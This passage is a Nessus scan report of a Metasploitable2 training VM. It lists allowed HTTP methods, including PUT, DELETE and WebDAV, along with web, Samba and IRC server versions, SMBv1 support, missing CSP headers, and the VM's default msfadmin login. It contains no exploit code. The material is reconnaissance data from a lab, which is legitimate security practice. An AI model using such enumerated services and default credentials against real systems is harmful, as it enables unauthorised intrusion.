- HTTP methods COPY DELETE GET HEAD LOCK MOVE OPTIONS POST PROPFIND
PROPPATCH TRACE UNLOCK are allowed on :

/dav

- HTTP methods GET HEAD OPTIONS POST TRACE are allowed on :

/doc
/dvwa/dvwa
/dvwa/dvwa/css
/dvwa/dvwa/images
/dvwa/dvwa/includes
/dvwa/dvwa/includes/DBMS
/dvwa/dvwa/js
/icons
/mutillidae/documentation
/mutillidae/styles
/mutillidae/styles/ddsmoothmenu
/test
/test/testoutput
/twiki

43111 - HTTP Methods Allowed (per directory)
-
Synopsis
This plugin determines which HTTP methods are allowed on various CGI directories.
Description
By calling the OPTIONS method, it is possible to determine which HTTP methods are allowed on each directory.

The following HTTP methods are considered insecure:
PUT, DELETE, CONNECT, TRACE, HEAD

Many frameworks and languages treat 'HEAD' as a 'GET' request, albeit one without any body in the response. If a security constraint was set on 'GET' requests such that only 'authenticatedUsers' could access GET requests for a particular servlet or resource, it would be bypassed for the 'HEAD' version. This allowed unauthorized blind submission of any privileged GET request.

As this list may be incomplete, the plugin also tests - if 'Thorough tests' are enabled or 'Enable web applications tests' is set to 'yes'
in the scan policy - various known HTTP methods on each directory and considers them as unsupported if it receives a response code of 400, 403, 405, or 501.

Note that the plugin output is only informational and does not necessarily indicate the presence of any security vulnerabilities.
See Also
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2009/12/10, Modified: 2022/04/11
Plugin Output

tcp/8180/www

Based on the response to an OPTIONS request :

- HTTP methods DELETE HEAD OPTIONS POST PUT TRACE GET
are allowed on :

/admin/error.jsp
/host-manager
/jsp-examples
/jsp-examples/cal
/jsp-examples/checkbox
/jsp-examples/colors
/jsp-examples/dates
/jsp-examples/error
/jsp-examples/forward
/jsp-examples/include
/jsp-examples/jsp2
/jsp-examples/jsp2/el
/jsp-examples/jsp2/jspattribute
/jsp-examples/jsp2/jspx
/jsp-examples/jsp2/misc
/servlets-examples

10107 - HTTP Server Type and Version
-
Synopsis
A web server is running on the remote host.
Description
This plugin attempts to determine the type and the version of the remote web server.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0931
Plugin Information
Published: 2000/01/04, Modified: 2020/10/30
Plugin Output

tcp/80/www

The remote web server type is :

Apache/2.2.8 (Ubuntu) DAV/2

10107 - HTTP Server Type and Version
-
Synopsis
A web server is running on the remote host.
Description
This plugin attempts to determine the type and the version of the remote web server.
Solution
n/a
Risk Factor
None
References
XREF IAVT:0001-T-0931
Plugin Information
Published: 2000/01/04, Modified: 2020/10/30
Plugin Output

tcp/8180/www

The remote web server type is :

Apache-Coyote/1.1

12053 - Host Fully Qualified Domain Name (FQDN) Resolution
-
Synopsis
It was possible to resolve the name of the remote host.
Description
Nessus was able to resolve the fully qualified domain name (FQDN) of the remote host.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2004/02/11, Modified: 2025/03/13
Plugin Output

tcp/0


172.19.0.2 resolves as metasploitable2.sicurform.

24260 - HyperText Transfer Protocol (HTTP) Information
-
Synopsis
Some information about the remote HTTP configuration can be extracted.
Description
This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive is enabled, etc...

This test is informational only and does not denote any security problem.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/01/30, Modified: 2024/02/26
Plugin Output

tcp/80/www


Response Code : HTTP/1.1 200 OK

Protocol version : HTTP/1.1
HTTP/2 TLS Support: No
HTTP/2 Cleartext Support: No
SSL : no
Keep-Alive : yes
Options allowed : (Not implemented)
Headers :

Date: Thu, 19 Jun 2025 09:39:40 GMT
Server: Apache/2.2.8 (Ubuntu) DAV/2
X-Powered-By: PHP/5.2.4-2ubuntu5.10
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Transfer-Encoding: chunked
Content-Type: text/html

Response Body :

<html><head><title>Metasploitable2 - Linux</title></head><body>
<pre>

_ _ _ _ _ _ ____
_ __ ___ ___| |_ __ _ ___ _ __ | | ___ (_) |_ __ _| |__ | | ___|___ \
| '_ ` _ \ / _ \ __/ _` / __| '_ \| |/ _ \| | __/ _` | '_ \| |/ _ \ __) |
| | | | | | __/ || (_| \__ \ |_) | | (_) | | || (_| | |_) | | __// __/
|_| |_| |_|\___|\__\__,_|___/ .__/|_|\___/|_|\__\__,_|_.__/|_|\___|_____|
|_|


Warning: Never expose this VM to an untrusted network!

Contact: msfdev[at]metasploit.com

Login with msfadmin/msfadmin to get started


</pre>
<ul>
<li><a href="/twiki/">TWiki</a></li>
<li><a href="/phpMyAdmin/">phpMyAdmin</a></li>
<li><a href="/mutillidae/">Mutillidae</a></li>
<li><a href="/dvwa/">DVWA</a></li>
<li><a href="/dav/">WebDAV</a></li>
</ul>
</body>
</html>

24260 - HyperText Transfer Protocol (HTTP) Information
-
Synopsis
Some information about the remote HTTP configuration can be extracted.
Description
This test gives some information about the remote HTTP protocol - the version used, whether HTTP Keep-Alive is enabled, etc...

This test is informational only and does not denote any security problem.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2007/01/30, Modified: 2024/02/26
Plugin Output

tcp/8180/www


Response Code : HTTP/1.1 200 OK

Protocol version : HTTP/1.1
HTTP/2 TLS Support: No
HTTP/2 Cleartext Support: No
SSL : no
Keep-Alive : no
Options allowed : GET, HEAD, POST, PUT, DELETE, TRACE, OPTIONS
Headers :

Server: Apache-Coyote/1.1
Content-Type: text/html;charset=ISO-8859-1
Date: Thu, 19 Jun 2025 09:39:31 GMT
Connection: close

Response Body :

<!--
Licensed to the Apache Software Foundation (ASF) under one or more
contributor license agreements. See the NOTICE file distributed with
this work for additional information regarding copyright ownership.
The ASF licenses this file to You under the Apache License, Version 2.0
(the "License"); you may not use this file except in compliance with
the License. You may obtain a copy of the License at

http://www.apache.org/licenses/LICENSE-2.0

Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
-->
<?xml version="1.0" encoding="ISO-8859-1"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head>
<title>Apache Tomcat/5.5</title>
<style type="text/css">
/*<![CDATA[*/
body {
color: #000000;
background-color: #FFFFFF;
font-family: Arial, "Times New Roman", Times, serif;
margin: 10px 0px;
}

img {
border: none;
}

a:link, a:visited {
color: blue
}

th {
font-family: Verdana, "Times New Roman", Times, serif;
font-size: 110%;
font-weight: normal;
font-style: italic;
background: #D2A41C;
text-align: left;
}

td {
color: #000000;
font-family: Arial, Helvetica, sans-serif;
}

td.menu {
background: #FFDC75;
}

.center {
text-align: center;
}

.code {
color: #000000;
font-family: "Courier New", Courier, monospace;
font-size: 110%;
margin-left: 2.5em;
}

#banner {
margin-bottom: 12px;
}

p#congrats {
margin-top: 0;
font-weight: bold;
text-align: center;
}

p#footer {
text-align: right;
font-size: 80%;
}
/*]]>*/
</style>
</head>

<body>

<!-- Header -->
<table id="banner" width="100%">
<tr>
<td align="left" style="width:130px">
<a href="http://tomcat.apache.org/">
<img src="tomcat.gif" height="92" width="130" alt="The Mighty Tomcat - MEOW!"/>
</a>
</td>
<td align="left" valign="top"><b>Apache Tomcat/5.5</b></td>
<td align="right">
<a href="http://www.apache.org/">
<img src="asf-logo-wide.gif" height="51" width="537" alt="The Apache Software Foundation"/>
</a>
</td>
</tr>
</table>

<table>
<tr>

<!-- Table of Contents -->
<td valign="top">
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Administration</th>
</tr>
<tr>
<td class="menu">
<a href="manager/status">Status</a><br/>
<a href="admin">Tomcat&nbsp;Administration</a><br/>
<a href="manager/html">Tomcat&nbsp;Manager</a><br/>
&nbsp;
</td>
</tr>
</table>

<br />
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Documentation</th>
</tr>
<tr>
<td class="menu">
<a href="RELEASE-NOTES.txt">Release&nbsp;Notes</a><br/>
<a href="tomcat-docs/changelog.html">Change&nbsp;Log</a><br/>
<a href="tomcat-docs">Tomcat&nbsp;Documentation</a><br/> &nbsp;
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Tomcat Online</th>
</tr>
<tr>
<td class="menu">
<a href="http://tomcat.apache.org/">Home&nbsp;Page</a><br/>
<a href="http://tomcat.apache.org/faq/">FAQ</a><br/>
<a href="http://tomcat.apache.org/bugreport.html">Bug&nbsp;Database</a><br/>
<a href="http://issues.apache.org/bugzilla/buglist.cgi?bug_status=UNCONFIRMED&amp;bug_status=NEW&amp;bug_status=ASSIGNED&amp;bug_status=REOPENED&amp;bug_status=RESOLVED&amp;resolution=LATER&amp;resolution=REMIND&amp;resolution=---&amp;bugidtype=include&amp;product=Tomcat+5&amp;cmdtype=doit&amp;order=Importance">Open Bugs</a><br/>
<a href="http://mail-archives.apache.org/mod_mbox/tomcat-users/">Users&nbsp;Mailing&nbsp;List</a><br/>
<a href="http://mail-archives.apache.org/mod_mbox/tomcat-dev/">Developers&nbsp;Mailing&nbsp;List</a><br/>
<a href="irc://irc.freenode.net/#tomcat">IRC</a><br/>
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Examples</th>
</tr>
<tr>
<td class="menu">
<a href="jsp-examples/">JSP&nbsp;Examples</a><br/>
<a href="servlets-examples/">Servlet&nbsp;Examples</a><br/>
<a href="webdav/">WebDAV&nbsp;capabilities</a><br/>
&nbsp;
</td>
</tr>
</table>

<br/>
<table width="100%" border="1" cellspacing="0" cellpadding="3">
<tr>
<th>Miscellaneous</th>
</tr>
<tr>
<td class="menu">
<a href="http://java.sun.com/products/jsp">Sun's&nbsp;Java&nbsp;Server&nbsp;Pages&nbsp;Site</a><br/>
<a href="http://java.sun.com/products/servlet">Sun's&nbsp;Servlet&nbsp;Site</a><br/>
&nbsp;
</td>
</tr>
</table>
</td>

<td style="width:20px">&nbsp;</td>

<!-- Body -->
<td align="left" valign="top">
<p id="congrats">If you're seeing this page via a web browser, it means you've setup Tomcat successfully. Congratulations!</p>

<p>As you may have guessed by now, this is the default Tomcat home page. It can be found on the local filesystem at:</p>
<p class="code">$CATALINA_HOME/webapps/ROOT/index.jsp</p>

<p>where "$CATALINA_HOME" is the root of the Tomcat installation directory. If you're seeing this page, and you don't think you should be, then either you're either a user who has arrived at new installation of Tomcat, or you're an administrator who hasn't got his/her setup quite right. Providing the latter is the case, please refer to the <a href="tomcat-docs">Tomcat Documentation</a> for more detailed setup and administration information than is found in the INSTALL file.</p>

<p><b>NOTE:</b> This page is precompiled. If you change it, this page will not change since
it was compiled into a servlet at build time.
(See <tt>$CATALINA_HOME/webapps/ROOT/WEB-INF/web.xml</tt> as to how it was mapped.)
</p>

<p><b>NOTE: For security reasons, using the administration webapp
is restricted to users with role "admin". The manager webapp
is restricted to users with role "manager".</b>
Users are defined in <code>$CATALINA_HOME/conf/tomcat-users.xml</code>.</p>

<p>Included with this release are a host of sample Servlets and JSPs (with associated source code), extensive documentation (including the Servlet 2.4 and JSP 2.0 API JavaDoc), and an introductory guide to developing web applications.</p>

<p>Tomcat mailing lists are available at the Tomcat project web site:</p>

<ul>
<li><b><a href="mailto:users@tomcat.apache.org">users@tomcat.apache.org</a></b> for general questions related to configuring and using Tomcat</li>
<li><b><a href="mailto:dev@tomcat.apache.org">dev@tomcat.apache.org</a></b> for developers working on Tomcat</li>
</ul>

<p>Thanks for using Tomcat!</p>

<p id="footer"><img src="tomcat-power.gif" width="77" height="80" alt="Powered by Tomcat"/><br/>
&nbsp;

Copyright &copy; 1999-2005 Apache Software Foundation<br/>
All Rights Reserved
</p>
</td>

</tr>
</table>

</body>
</html>

11156 - IRC Daemon Version Detection
-
Synopsis
The remote host is an IRC server.
Description
This plugin determines the version of the IRC daemon.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/11/19, Modified: 2016/01/08
Plugin Output

tcp/6667/irc

The IRC server version is : Unreal3.2.8.1. FhiXOoE [*=2309]

10397 - Microsoft Windows SMB LanMan Pipe Server Listing Disclosure
-
Synopsis
It is possible to obtain network information.
Description
It was possible to obtain the browse list of the remote Windows system by sending a request to the LANMAN pipe. The browse list is the list of the nearest Windows systems of the remote host.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2000/05/09, Modified: 2022/02/01
Plugin Output

tcp/445/cifs


Here is the browse list of the remote host :

04CBEBC48A57 ( os : 0.0 )
10785 - Microsoft Windows SMB NativeLanManager Remote System Information Disclosure
-
Synopsis
It was possible to obtain information about the remote operating system.
Description
Nessus was able to obtain the remote operating system name and version (Windows and/or Samba) by sending an authentication request to port 139 or 445. Note that this plugin requires SMB to be enabled on the host.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2001/10/17, Modified: 2021/09/20
Plugin Output

tcp/445/cifs

The remote Operating System is : Unix
The remote native LAN manager is : Samba 3.0.20-Debian
The remote SMB Domain Name is : 04CBEBC48A57

11011 - Microsoft Windows SMB Service Detection
-
Synopsis
A file / print sharing service is listening on the remote host.
Description
The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/06/05, Modified: 2021/02/11
Plugin Output

tcp/139/smb


An SMB server is running on this port.

11011 - Microsoft Windows SMB Service Detection
-
Synopsis
A file / print sharing service is listening on the remote host.
Description
The remote service understands the CIFS (Common Internet File System) or Server Message Block (SMB) protocol, used to provide shared access to files, printers, etc between nodes on a network.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2002/06/05, Modified: 2021/02/11
Plugin Output

tcp/445/cifs


A CIFS server is running on this port.
100871 - Microsoft Windows SMB Versions Supported (remote check)
-
Synopsis
It was possible to obtain information about the version of SMB running on the remote host.
Description
Nessus was able to obtain the version of SMB running on the remote host by sending an authentication request to port 139 or 445.

Note that this plugin is a remote check and does not work on agents.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2017/06/19, Modified: 2019/11/22
Plugin Output

tcp/445/cifs


The remote host supports the following versions of SMB :
SMBv1
106716 - Microsoft Windows SMB2 and SMB3 Dialects Supported (remote check)
-
Synopsis
It was possible to obtain information about the dialects of SMB2 and SMB3 available on the remote host.
Description
Nessus was able to obtain the set of SMB2 and SMB3 dialects running on the remote host by sending an authentication request to port 139 or 445.
Solution
n/a
Risk Factor
None
Plugin Information
Published: 2018/02/09, Modified: 2020/03/11
Plugin Output

tcp/445/cifs


The remote host does NOT support the following SMB dialects :
_version_ _introduced in windows version_
2.0.2 Windows 2008
2.1 Windows 7
2.2.2 Windows 8 Beta
2.2.4 Windows 8 Beta
3.0 Windows 8
3.0.2 Windows 8.1
3.1 Windows 10
3.1.1 Windows 10

50344 - Missing or Permissive Content-Security-Policy frame-ancestors HTTP Response Header
-
Synopsis
The remote web server does not take steps to mitigate a class of web application vulnerabilities.
Description
The remote web server in some responses sets a permissive Content-Security-Policy (CSP) frame-ancestors response header or does not set one at all.

The CSP frame-ancestors header has been proposed by the W3C Web Application Security Working Group as a way to mitigate cross-site scripting and clickjacking attacks.
See Also
Solution
Set a non-permissive Content-Security-Policy frame-ancestors header for all requested resources.
Risk Factor
None
Plugin Information
Published: 2010/10/26, Modified: 2021/01/19
Plugin Output

tcp/80/www


The following pages do not set a Content-Security-Policy frame-ancestors response header or set a permissive policy:

- http://metasploitable2.sicurform/
- http://metasploitable2.sicurform/dav/
- http://metasploitable2.sicurform/dvwa/dvwa/
- http://metasploitable2.sicurform/dvwa/dvwa/css/
- http://metasploitable2.sicurform/dvwa/dvwa/images/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/DBMS.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/DBMS/MySQL.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPage.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/includes/dvwaPhpIds.inc.php
- http://metasploitable2.sicurform/dvwa/dvwa/js/
- http://metasploitable2.sicurform/dvwa/login.php
- http://metasploitable2.sicurform/mutillidae/
- http://metasploitable2.sicurform/mutillidae/documentation/
- http://metasploitable2.sicurform/mutillidae/documentation/how-to-access-Mutillidae-over-Virtual-Box-network.php
- http://metasploitable2.sicurform/mutillidae/documentation/vulnerabilities.php
- http://metasploitable2.sicurform/mutillidae/framer.html
- http://metasploitable2.sicurform/mutillidae/index.php
- http://metasploitable2.sicurform/mutillidae/set-up-database.php
- http://metasploitable2.sicurform/mutillidae/styles/
- http://metasploitable2.sicurform/mutillidae/styles/ddsmoothmenu/
- http://metasploitable2.sicurform/phpMyAdmin/
- http://metasploitable2.sicurform/phpMyAdmin/index.php
- http://metasploitable2.sicurform/test/
- http://metasploitable2.sicurform/test/testoutput/
- http://metasploitable2.sicurform/twiki/
- http://metasploitable2.sicurform/twiki/TWikiHistory.html
- http://metasploitable2.sicurform/twiki/bin/oops
- http://metasploitable2.sicurform/twiki/bin/oops/Main
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour
- http://metasploitable2.sicurform/twiki/bin/oops/Main/WebHomemailto%3Awebmasteryour/company
- http://metasploitable2.sicurform/twiki/bin/search
- http://metasploitable2.sicurform/twiki/bin/search/Main
- http://metasploitable2.sicurform/twiki/bin/search/Main/SearchResult
- http://metasploitable2.sicurform/twiki/bin/view
- http://metasploitable2.sicurform/twiki/bin/view/Main
- http://metasploitable2.sicurform/twiki/bin/view/Main/WebHome

50344 - Missing or Permissive Content-Security-Policy frame-ancestors HTTP Response Header
-
Synopsis
The remote web server does not take steps to mitigate a class of web application vulnerabilities.
Description
The remote web server in some responses sets a permissive Content-Security-Policy (CSP) frame-ancestors response header or does not set one at all.

The CSP frame-ancestors header has been proposed by the W3C Web Application Security Working Group as a way to mitigate cross-site scripting and clickjacking attacks.
See Also
Solution
Set a non-permissive Content-Security-Policy frame-ancestors header for all requested resources.
Risk Factor
None
Plugin Information
Published: 2010/10/26, Modified: 2021/01/19
Plugin Output

tcp/8180/www


The following pages do not set a Content-Security-Policy frame-ancestors response header or set a permissive policy:

- http://metasploitable2.sicurform:8180/
- http://metasploitable2.sicurform:8180/admin/
- http://metasploitable2.sicurform:8180/admin/error.jsp
- http://metasploitable2.sicurform:8180/admin/j_security_check
- http://metasploitable2.sicurform:8180/jsp-examples/
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entries.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/Entry.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/TableBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal1.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/cal2.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/calendar.html
- http://metasploitable2.sicurform:8180/jsp-examples/cal/login.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/CheckTest.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/check.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/checkresult.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/checkbox/cresult.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/ColorGameBean.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/clr.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colors.html
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/colors/colrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.html
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/dates/date.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/er.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/error/err.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/error/error.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/forward/forward.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/forward/fwd.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/inc.html
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/include/include.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/index.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-arithmetic.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/basic-comparisons.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/functions.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/el/implicit-objects.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/FooBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/ShuffleSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/TileSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/jspattribute.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspattribute/shuffle.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/basic.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/svgexample.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/jspx/textRotate.jspx.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/EchoAttributesTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/coda.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/config.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/dynamicattrs.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/misc/prelude.jspf.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/BookBean.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/FindBookSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/Functions.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/HelloWorldSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/RepeatSimpleTag.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/book.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/simpletag/repeat.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/displayProducts.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/hello.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/helloWorld.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/panel.tag.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsp2/tagfiles/products.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jsptoservlet.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/jts.html
- http://metasploitable2.sicurform:8180/jsp-examples/jsptoserv/servletToJsp.java.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.html
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/num/numguess.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.html
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/plugin/plugin.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/DummyCart.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/carts.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/sessions/crt.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.html
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/simpletag/foo.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.html
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/snp/snoop.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/choose.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/foreach.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/howto.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/if.jsp.html
- http://metasploitable2.sicurform:8180/jsp-examples/tagplugin/notes.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.html
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp
- http://metasploitable2.sicurform:8180/jsp-examples/xml/xml.jsp.html
- http://metasploitable2.sicurform:8180/servlets-examples/
- http://metasploitable2.sicurform:8180/servlets-examples/cookies.html
- http://metasploitable2.sicurform:8180/servlets-examples/helloworld.html
- http://metasploitable2.sicurform:8180/servlets-examples/index.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqheaders.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqinfo.html
- http://metasploitable2.sicurform:8180/servlets-examples/reqparams.html
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/CookieExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/HelloWorldExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestHeaderExample
- http://metasploitable2.sicurform:8180/servlets-examples/servlet/RequestInfoExample
